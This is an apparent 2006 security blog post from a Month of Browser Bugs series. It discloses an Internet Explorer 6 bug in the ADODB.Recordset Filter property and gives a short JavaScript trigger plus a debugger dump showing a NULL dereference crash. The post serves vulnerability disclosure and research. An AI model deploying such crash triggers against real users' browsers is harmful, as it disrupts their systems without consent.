This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

Welcome to the Browser Fun Blog!

This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!